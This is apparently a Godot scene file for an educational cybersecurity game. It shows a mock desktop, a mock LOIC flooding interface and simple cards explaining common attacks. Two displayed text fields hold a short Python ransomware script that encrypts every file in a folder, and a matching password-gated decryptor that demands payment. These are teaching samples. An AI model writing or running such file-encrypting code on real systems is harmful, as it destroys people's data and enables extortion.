[gd_scene load_steps=26 format=3 uid="uid://jjhva651ce8b"]

[ext_resource type="Script" uid="uid://ds26kq6wue5fa" path="res://Scenes/GUI/Ransomware/desktop_default.gd" id="1_pekke"]
[ext_resource type="PackedScene" uid="uid://cnlake8o686ww" path="res://Scenes/GUI/CleanUI/icon.tscn" id="2_bikpg"]
[ext_resource type="Texture2D" uid="uid://bn60eqphar820" path="res://Assets/Illustrator/sqlv2.png" id="3_pekke"]
[ext_resource type="Texture2D" uid="uid://b86yma60ro7sv" path="res://Assets/Illustrator/imgv2.png" id="4_xxt4y"]
[ext_resource type="Texture2D" uid="uid://igl7s83ahvyl" path="res://Assets/Illustrator/txtv2.png" id="5_qd57o"]
[ext_resource type="Texture2D" uid="uid://dic1btggpc3hd" path="res://Assets/Illustrator/browserv2.png" id="6_bikpg"]
[ext_resource type="Texture2D" uid="uid://cddfhvys55v1f" path="res://Assets/Illustrator/pythonv2.png" id="6_vlt0p"]
[ext_resource type="Script" uid="uid://btalbkmaah46c" path="res://Scripts/GUI/desktop.gd" id="7_pga4f"]
[ext_resource type="Texture2D" uid="uid://5wmj07ol6sdc" path="res://Assets/Illustrator/vscode.png" id="7_qd57o"]
[ext_resource type="Texture2D" uid="uid://u0hu4tpihhy7" path="res://Assets/Illustrator/exe.png" id="8_hyjlr"]
[ext_resource type="PackedScene" uid="uid://bcejk3vddejkh" path="res://Scenes/GUI/CleanUI/window.tscn" id="9_p75vd"]
[ext_resource type="PackedScene" uid="uid://d1uhpiic8wwi3" path="res://Scenes/GUI/laptop_browser.tscn" id="9_qd57o"]
[ext_resource type="Texture2D" uid="uid://bjymg66wnrrvo" path="res://icon.svg" id="10_o41mf"]
[ext_resource type="Shader" uid="uid://bsnbgo8bcttif" path="res://GUI/Pause Menu/blur.gdshader" id="10_pekke"]
[ext_resource type="PackedScene" uid="uid://bd84mf3o5vdh5" path="res://Scenes/GUI/cyberattack_card.tscn" id="11_woodw"]
[ext_resource type="Theme" uid="uid://rartua8qh51p" path="res://Themes/LOIC.tres" id="13_hyjlr"]

[sub_resource type="StyleBoxFlat" id="StyleBoxFlat_xxt4y"]
content_margin_left = 50.0
content_margin_top = 25.0
content_margin_right = 50.0
content_margin_bottom = 25.0
bg_color = Color(0.18039216, 0.20784314, 0.23921569, 1)

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_4a78q"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_4hk0t"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_n0ku7"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_rmr1e"]

[sub_resource type="StyleBoxEmpty" id="StyleBoxEmpty_pxfw1"]

[sub_resource type="ShaderMaterial" id="ShaderMaterial_bikpg"]
shader = ExtResource("10_pekke")
shader_parameter/amount = 2.775

[sub_resource type="Animation" id="Animation_xxt4y"]
resource_name = "dos"

[sub_resource type="AnimationLibrary" id="AnimationLibrary_pga4f"]
_data = {
&"dos": SubResource("Animation_xxt4y")
}

[node name="DesktopDefault" type="MarginContainer" node_paths=PackedStringArray("shader", "cards_container", "malware_icon", "decr_icon", "key_icon", "loic_icon")]
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
theme_override_constants/margin_left = 25
theme_override_constants/margin_top = 25
theme_override_constants/margin_right = 25
theme_override_constants/margin_bottom = 25
script = ExtResource("1_pekke")
shader = NodePath("BlurShader")
cards_container = NodePath("CyberAttackCards")
malware_icon = NodePath("Desktop/Malware_icon")
decr_icon = NodePath("Desktop/Decr_icon")
key_icon = NodePath("Desktop/Key_icon")
loic_icon = NodePath("Desktop/LOICIcon")
metadata/_tab_index = 0

[node name="Desktop" type="VFlowContainer" parent="."]
layout_mode = 2
theme_override_constants/h_separation = 20

[node name="Data_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/SQLWindow")
icon = ExtResource("3_pekke")
icon_name = "Data.sql"

[node name="Godot_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/GodotWindow")
icon = ExtResource("4_xxt4y")
icon_name = "Godot.png"

[node name="Text_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/Text_1Window")
icon = ExtResource("5_qd57o")
icon_name = "Text.txt"

[node name="BrowserIcon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/Website")
icon = ExtResource("6_bikpg")
icon_name = "Browser"

[node name="Malware_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
visible = false
layout_mode = 2
window = NodePath("../../WindowContainer/MalwareWindow")
icon = ExtResource("6_vlt0p")
icon_name = "Malware.py"

[node name="Decr_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
visible = false
layout_mode = 2
window = NodePath("../../WindowContainer/DecryWindow")
icon = ExtResource("6_vlt0p")
icon_name = "Decr.py"

[node name="Key_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
visible = false
layout_mode = 2
window = NodePath("../../WindowContainer/KeyWindow")
icon = ExtResource("5_qd57o")
icon_name = "Key.key"

[node name="VSIcon" parent="Desktop" instance=ExtResource("2_bikpg")]
layout_mode = 2
icon = ExtResource("7_qd57o")
icon_name = "VSCode"

[node name="LOICIcon" parent="Desktop" instance=ExtResource("2_bikpg")]
visible = false
layout_mode = 2
icon = ExtResource("8_hyjlr")
icon_name = "LOIC"

[node name="WindowContainer" type="Control" parent="." node_paths=PackedStringArray("cyberattack_lbl")]
layout_mode = 2
mouse_filter = 2
script = ExtResource("7_pga4f")
cyberattack_lbl = NodePath("Label")
ransomware_recon_done = true

[node name="Website" parent="WindowContainer" instance=ExtResource("9_qd57o")]
visible = false
layout_mode = 0
anchors_preset = 0
anchor_right = 0.0
anchor_bottom = 0.0
offset_left = -25.0
offset_top = -25.0
offset_right = 1127.0
offset_bottom = 623.0
grow_horizontal = 1
grow_vertical = 1

[node name="GodotWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.392015
anchor_top = 0.162207
anchor_right = 0.95735
anchor_bottom = 0.737458

[node name="Title" parent="WindowContainer/GodotWindow/HBoxContainer" index="0"]
text = "godot.png"

[node name="TextureRect" type="TextureRect" parent="WindowContainer/GodotWindow/MarginContainer/VBoxContainer" index="0"]
custom_minimum_size = Vector2(-6.2, 260.78)
layout_mode = 2
texture = ExtResource("10_o41mf")

[node name="SQLWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.391107
anchor_top = 0.135452
anchor_right = 0.90326
anchor_bottom = 0.715698

[node name="Title" parent="WindowContainer/SQLWindow/HBoxContainer" index="0"]
text = "data.sql"

[node name="Label" type="Label" parent="WindowContainer/SQLWindow/MarginContainer/VBoxContainer" index="0"]
layout_mode = 2
text = "create database test;
use database test;

create table ransom(
      rid int auto_increment,
     rkey bigint not null
)"

[node name="Text_1Window" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.342105
anchor_top = 0.0769231
anchor_right = 0.854258
anchor_bottom = 0.65717

[node name="Title" parent="WindowContainer/Text_1Window/HBoxContainer" index="0"]
text = "text.txt"

[node name="Label" type="Label" parent="WindowContainer/Text_1Window/MarginContainer/VBoxContainer" index="0"]
layout_mode = 2
text = "This text file is compose of your personal data such as:
-> Email Address and Passwords
-> Credit Card Number and Pin Numbers
-> Mobile Numbers"

[node name="KeyWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.364791
anchor_top = 0.167224
anchor_right = 0.916515
anchor_bottom = 0.714047
offset_left = -25.0
offset_top = -25.0
offset_right = -25.0
offset_bottom = -25.0

[node name="Title" parent="WindowContainer/KeyWindow/HBoxContainer" index="0"]
text = "key.key"

[node name="CodeEdit" type="CodeEdit" parent="WindowContainer/KeyWindow"]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
offset_left = 7.0
offset_top = 32.0
offset_right = -7.0
offset_bottom = -7.0
grow_horizontal = 2
grow_vertical = 2
theme_override_colors/font_readonly_color = Color(1, 1, 1, 1)
theme_override_colors/background_color = Color(0, 0, 0, 0)
editable = false

[node name="MalwareWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.392015
anchor_top = 0.262542
anchor_right = 0.92196
anchor_bottom = 0.884615

[node name="Title" parent="WindowContainer/MalwareWindow/HBoxContainer" index="0"]
text = "malware.py"

[node name="CodeEdit" type="CodeEdit" parent="WindowContainer/MalwareWindow"]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
offset_left = 7.0
offset_top = 32.0
offset_right = -7.0
offset_bottom = -7.0
grow_horizontal = 2
grow_vertical = 2
theme_override_colors/font_readonly_color = Color(1, 1, 1, 1)
theme_override_colors/background_color = Color(0, 0, 0, 0)
text = "import os from cryptography.fernet 
import fernet

allfiles = [ ]
for file in os.listdir():
	if file == 'malware.py' or file == 'key.key' or file == ' decr.py':
		continue
	if os.path.isfile(file):
		allfiles.append(file)
print (allfiles)

key = Fernet.generate_key()
with open ('key.key', 'wb') as thekey: 
	thekey.write(key)

for file in allfiles:
	with open(file, 'rb') as thefile:
		content = thefile.read()
	content_encryp = Fernet(key).encrypt(content)
	with open(file, 'wb') as thefile: 
		thefile.write(content_encryp)

print('All your files have been encrypted')"
editable = false

[node name="DecryWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.355717
anchor_top = 0.192308
anchor_right = 0.889292
anchor_bottom = 0.849498

[node name="Title" parent="WindowContainer/DecryWindow/HBoxContainer" index="0"]
text = "derc.py"

[node name="CodeEdit" type="CodeEdit" parent="WindowContainer/DecryWindow"]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
offset_left = 7.0
offset_top = 32.0
offset_right = -7.0
offset_bottom = -7.0
grow_horizontal = 2
grow_vertical = 2
theme_override_colors/font_readonly_color = Color(1, 1, 1, 1)
theme_override_colors/background_color = Color(0, 0, 0, 0)
text = "import os 
from cryptography.fernetimport fernet

allfiles = []
for file in os.listdir():
	if file == 'malware.py' or file == 'key.key' or file == 'decr.py':
		continue
	if os.path.isfile(file):
		allfiles.append(file)

print(allfiles)

with open('key.key', 'rb') as key:
		password = key.read()
passphrase = 'WhiteHat'
userpass = input('Enter the password you received from us:')

if userpass == passphrase:
	for file in allfiles:
		with open(file, 'rb') as thefile:
			 contents = thefile.read()
		content_decr = Fernet(password).decrypt(contents)
		with open(file, 'wb') as thefile:
 			thefile.write(content_decr)
		print(\"You got your files back\")
else: 
        print (\"Wrong password! Pay to receive the right password\")
"
editable = false

[node name="Label" type="Label" parent="WindowContainer"]
visible = false
layout_mode = 1
anchors_preset = -1
anchor_left = 0.45735
anchor_top = 0.961538
anchor_right = 0.504537
anchor_bottom = 1.0
offset_bottom = 6.10352e-05
grow_horizontal = 2
grow_vertical = 0
text = "simple"
metadata/_edit_use_anchors_ = true

[node name="LOICWindow" type="PanelContainer" parent="WindowContainer"]
visible = false
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
theme_override_styles/panel = SubResource("StyleBoxFlat_xxt4y")

[node name="VBoxContainer" type="VBoxContainer" parent="WindowContainer/LOICWindow"]
layout_mode = 2
theme = ExtResource("13_hyjlr")
theme_override_constants/separation = 14

[node name="Title" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer"]
layout_mode = 2
theme_override_font_sizes/font_size = 35
text = "Low Orbit Ion Cannon"
horizontal_alignment = 1

[node name="HBoxContainer" type="HBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer"]
layout_mode = 2
theme_override_constants/separation = 29
alignment = 1

[node name="PanelContainer" type="PanelContainer" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer"]
layout_mode = 2
size_flags_horizontal = 3

[node name="VBoxContainer" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer"]
layout_mode = 2

[node name="HBoxContainer" type="HBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer"]
layout_mode = 2
theme_override_constants/separation = 25
alignment = 2

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer/HBoxContainer"]
layout_mode = 2
size_flags_horizontal = 3
text = "URL: "

[node name="OptionButton" type="OptionButton" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer/HBoxContainer"]
custom_minimum_size = Vector2(500, 15)
layout_mode = 2

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer/HBoxContainer"]
layout_mode = 2
text = "Lock"

[node name="HBoxContainer2" type="HBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer"]
layout_mode = 2
theme_override_constants/separation = 25
alignment = 2

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer/HBoxContainer2"]
layout_mode = 2
size_flags_horizontal = 3
text = "IP: "

[node name="OptionButton" type="OptionButton" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer/HBoxContainer2"]
custom_minimum_size = Vector2(500, 15)
layout_mode = 2

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer/VBoxContainer/HBoxContainer2"]
layout_mode = 2
text = "Lock"

[node name="PanelContainer2" type="PanelContainer" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer"]
layout_mode = 2

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/HBoxContainer/PanelContainer2"]
layout_mode = 2
theme_override_styles/normal = SubResource("StyleBoxEmpty_4a78q")
theme_override_styles/pressed = SubResource("StyleBoxEmpty_4hk0t")
theme_override_styles/hover = SubResource("StyleBoxEmpty_n0ku7")
theme_override_styles/disabled = SubResource("StyleBoxEmpty_rmr1e")
theme_override_styles/focus = SubResource("StyleBoxEmpty_pxfw1")
text = "STOP FLOODING"

[node name="IPContainer" type="PanelContainer" parent="WindowContainer/LOICWindow/VBoxContainer"]
layout_mode = 2

[node name="IPAddress" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/IPContainer"]
layout_mode = 2
theme_override_font_sizes/font_size = 71
text = "192.168.41.1"
horizontal_alignment = 1

[node name="PanelContainer2" type="PanelContainer" parent="WindowContainer/LOICWindow/VBoxContainer"]
layout_mode = 2

[node name="VBoxContainer" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2"]
layout_mode = 2

[node name="TopRow" type="HBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer"]
layout_mode = 2
theme_override_constants/separation = 29
alignment = 1

[node name="Timeout" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow"]
layout_mode = 2
alignment = 1

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow/Timeout"]
layout_mode = 2
text = "Timeout"

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow/Timeout"]
layout_mode = 2
text = "9001"

[node name="VBoxContainer2" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow"]
layout_mode = 2

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow/VBoxContainer2"]
layout_mode = 2
text = "HTTP Subtitle"

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow/VBoxContainer2"]
custom_minimum_size = Vector2(500, 0)
layout_mode = 2
text = "/"

[node name="VBoxContainer3" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow"]
layout_mode = 2
size_flags_horizontal = 3

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow/VBoxContainer3"]
layout_mode = 2
text = "TCP/UDP Message"

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/TopRow/VBoxContainer3"]
layout_mode = 2
text = "I love cookies <3"

[node name="BottomRow" type="HBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer"]
layout_mode = 2
theme_override_constants/separation = 24
alignment = 1

[node name="Port" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow"]
layout_mode = 2
alignment = 1

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/Port"]
layout_mode = 2
text = "Port"

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/Port"]
layout_mode = 2
text = "4500"

[node name="Methods" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow"]
layout_mode = 2
alignment = 1

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/Methods"]
layout_mode = 2
text = "Methods"

[node name="OptionButton" type="OptionButton" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/Methods"]
layout_mode = 2
selected = 1
item_count = 6
popup/item_0/text = "TCP"
popup/item_0/id = 0
popup/item_1/text = "UDP"
popup/item_1/id = 1
popup/item_2/text = "HTTP"
popup/item_2/id = 2
popup/item_3/text = "ReCol"
popup/item_3/id = 3
popup/item_4/text = "SlowLOIC"
popup/item_4/id = 4
popup/item_5/text = "UCMP"
popup/item_5/id = 5

[node name="Threads" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow"]
layout_mode = 2
alignment = 1

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/Threads"]
layout_mode = 2
text = "Threads"

[node name="Button" type="Button" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/Threads"]
layout_mode = 2
text = "10"

[node name="HBoxContainer" type="HBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow"]
layout_mode = 2

[node name="CheckBox" type="CheckBox" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/HBoxContainer"]
layout_mode = 2
size_flags_vertical = 8

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/HBoxContainer"]
layout_mode = 2
size_flags_vertical = 8
text = "Wait for reply"

[node name="VBoxContainer" type="VBoxContainer" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow"]
layout_mode = 2
size_flags_horizontal = 3
alignment = 2

[node name="HSlider" type="HSlider" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/VBoxContainer"]
layout_mode = 2

[node name="Label" type="Label" parent="WindowContainer/LOICWindow/VBoxContainer/PanelContainer2/VBoxContainer/BottomRow/VBoxContainer"]
layout_mode = 2
size_flags_vertical = 8
text = "<= faster   Speed   slower =>"
horizontal_alignment = 1

[node name="DecryptedMessage" type="Label" parent="."]
visible = false
layout_mode = 2
size_flags_vertical = 8
theme_override_font_sizes/font_size = 22
text = "Now the files have been dencrypted. You can now access all the files"
metadata/_edit_use_anchors_ = true

[node name="BlurShader" type="ColorRect" parent="."]
visible = false
material = SubResource("ShaderMaterial_bikpg")
layout_mode = 2
mouse_filter = 2
color = Color(0, 0, 0, 0.309804)

[node name="CyberAttackCards" type="ScrollContainer" parent="."]
visible = false
layout_mode = 2

[node name="VBoxContainer" type="HBoxContainer" parent="CyberAttackCards"]
layout_mode = 2

[node name="NoneCard" parent="CyberAttackCards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Title" parent="CyberAttackCards/VBoxContainer/NoneCard/MarginContainer/VBoxContainer" index="0"]
text = "None"

[node name="Label" parent="CyberAttackCards/VBoxContainer/NoneCard/MarginContainer/VBoxContainer" index="3"]
text = "Return to desktop"

[node name="Ransomware_card" parent="CyberAttackCards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Label" parent="CyberAttackCards/VBoxContainer/Ransomware_card/MarginContainer/VBoxContainer" index="3"]
text = "Ransomware is a kind of harmful software that locks your files and asks for money to unlock them. Imagine someone putting a padlock on your school bag and saying you need to pay to get the key. It usually spreads through suspicious emails, links, or downloads, and once it’s in your computer, it blocks you from your own files. The problem is, even if you pay, there’s no promise you’ll get them back, which is why it’s so important to be careful online, keep backups, and update your devices.
"

[node name="Bruteforce_card" parent="CyberAttackCards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2
unlocked_day = 2

[node name="Title" parent="CyberAttackCards/VBoxContainer/Bruteforce_card/MarginContainer/VBoxContainer" index="0"]
text = "Bruteforce"

[node name="Label" parent="CyberAttackCards/VBoxContainer/Bruteforce_card/MarginContainer/VBoxContainer" index="3"]
text = "A brute force attack is when someone tries to guess a password by testing every possible combination until they find the right one. It’s like trying every key on a keychain to open a locked door—slow but effective if the lock (or password) is weak. To prevent this change your password more frequently and use special characters."

[node name="Fileless_card" parent="CyberAttackCards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2
unlocked_day = 3

[node name="Title" parent="CyberAttackCards/VBoxContainer/Fileless_card/MarginContainer/VBoxContainer" index="0"]
text = "Fileless"

[node name="Label" parent="CyberAttackCards/VBoxContainer/Fileless_card/MarginContainer/VBoxContainer" index="3"]
text = "Fileless malware never writes a new file to disk. It runs in memory or hides inside built in system tools like scripting hosts and scheduled tasks so signature based scanners often miss it, and defenders must watch behavior, memory activity, and suspicious command lines to catch it."

[node name="Phishing_card" parent="CyberAttackCards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2
unlocked_day = 4

[node name="Title" parent="CyberAttackCards/VBoxContainer/Phishing_card/MarginContainer/VBoxContainer" index="0"]
text = "Phishing"

[node name="Label" parent="CyberAttackCards/VBoxContainer/Phishing_card/MarginContainer/VBoxContainer" index="3"]
text = "A trick where attackers pretend to be someone you trust to steal credentials or data, usually via fake emails or links that ask you to log in or share sensitive information."

[node name="DoS_card" parent="CyberAttackCards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2
unlocked_day = 5

[node name="Title" parent="CyberAttackCards/VBoxContainer/DoS_card/MarginContainer/VBoxContainer" index="0"]
text = "Denial of Services"

[node name="Label" parent="CyberAttackCards/VBoxContainer/DoS_card/MarginContainer/VBoxContainer" index="3"]
text = "An attack that overwhelms a server or network with traffic or requests so legitimate users cannot access the service, causing outages or slowdowns until the attack stops or defenses kick in."

[node name="AnimationPlayer" type="AnimationPlayer" parent="."]
libraries = {
&"": SubResource("AnimationLibrary_pga4f")
}

[connection signal="pressed" from="Desktop/VSIcon" to="." method="show_cards"]
[connection signal="pressed" from="Desktop/LOICIcon" to="." method="_on_loic_icon_pressed"]
[connection signal="pressed" from="CyberAttackCards/VBoxContainer/NoneCard/Button" to="." method="hide_cards"]
[connection signal="pressed" from="CyberAttackCards/VBoxContainer/Ransomware_card/Button" to="." method="_ransomware_pressed"]
[connection signal="pressed" from="CyberAttackCards/VBoxContainer/Bruteforce_card/Button" to="." method="_bruteforce_pressed"]
[connection signal="pressed" from="CyberAttackCards/VBoxContainer/Fileless_card/Button" to="." method="_fileless_pressed"]
[connection signal="pressed" from="CyberAttackCards/VBoxContainer/Phishing_card/Button" to="." method="_phishing_pressed"]
[connection signal="pressed" from="CyberAttackCards/VBoxContainer/DoS_card/Button" to="." method="_dos_pressed"]

[editable path="WindowContainer/GodotWindow"]
[editable path="WindowContainer/SQLWindow"]
[editable path="WindowContainer/Text_1Window"]
[editable path="WindowContainer/KeyWindow"]
[editable path="WindowContainer/MalwareWindow"]
[editable path="WindowContainer/DecryWindow"]
[editable path="CyberAttackCards/VBoxContainer/NoneCard"]
[editable path="CyberAttackCards/VBoxContainer/Ransomware_card"]
[editable path="CyberAttackCards/VBoxContainer/Bruteforce_card"]
[editable path="CyberAttackCards/VBoxContainer/Fileless_card"]
[editable path="CyberAttackCards/VBoxContainer/Phishing_card"]
[editable path="CyberAttackCards/VBoxContainer/DoS_card"]
